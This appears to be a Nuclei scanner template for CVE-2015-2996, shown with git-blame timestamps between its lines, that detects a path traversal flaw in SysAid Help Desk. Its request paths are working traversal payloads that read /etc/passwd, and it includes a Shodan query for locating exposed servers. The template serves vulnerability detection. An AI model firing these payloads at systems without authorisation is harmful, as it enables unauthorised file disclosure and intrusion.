2022-09-27 21:42:24 +00:00
id : CVE-2015-2996
2023-02-07 04:30:16 +00:00
2022-09-27 21:42:24 +00:00
info :
2023-02-22 18:53:47 +00:00
name : SysAid Help Desk <15.2 - Local File Inclusion
2022-09-27 21:42:24 +00:00
author : 0x_Akoko
severity : high
2023-02-07 04:29:53 +00:00
description : |
2023-02-22 18:56:39 +00:00
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
2022-09-27 21:42:24 +00:00
reference :
- https://seclists.org/fulldisclosure/2015/Jun/8
2023-02-07 06:27:25 +00:00
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
2023-02-21 22:01:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
2022-09-27 21:42:24 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
cvss-score : 8.5
2022-09-27 21:42:24 +00:00
cve-id : CVE-2015-2996
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.77754
cpe : cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.97813
2023-02-07 04:29:53 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-02-07 06:06:01 +00:00
shodan-query : http.favicon.hash:1540720428
2023-07-11 19:49:27 +00:00
vendor : sysaid
product : sysaid
2023-02-07 06:27:25 +00:00
tags : cve,cve2015,sysaid,lfi,seclists
2022-09-27 21:42:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-27 21:42:24 +00:00
- method : GET
path :
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2023-02-07 04:29:53 +00:00
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2022-09-27 21:42:24 +00:00
2023-02-07 04:29:53 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-09-27 21:42:24 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200